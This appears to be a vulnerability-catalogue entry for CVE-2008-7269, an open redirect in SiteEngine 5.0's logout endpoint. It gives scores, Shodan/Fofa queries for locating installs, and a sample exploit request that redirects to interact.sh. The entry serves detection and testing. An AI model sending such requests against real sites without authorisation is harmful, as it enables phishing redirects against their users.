🔙 목록으로 돌아가기

CVE-2008-7269: UC Gateway Investment SiteEngine v5.0 - Open Redirect

TitleUC Gateway Investment SiteEngine v5.0 - Open Redirect
Authorctflearner
SeverityMedium
ImpactAttackers can redirect users to malicious sites for phishing or malware distribution.
RemediationApply the latest patches or updates provided by the vendor to fix the open redirect vulnerability.
CVSS Score5.8
EPSS Score0.04298
CVE IDCVE-2008-7269
CWE IDCWE-20
Shodan Queryhtml:"SiteEngine"http.html:"siteengine"
Fofa Querybody="siteengine"
Tags cve cve2008 redirect siteengine boka vuln

🔍 Vulnerability Description

Open redirect vulnerability in api.php in SiteEngine 5.x allows user-assisted remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the forward parameter in a logout action.

🌐 HTTP Request

GET /api.php?action=logout&forward=http://interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ConnectPC Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2008/CVE-2008-7269.yaml

🦈 Packet Capture: ⬇️ Download cve-2008-7269.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A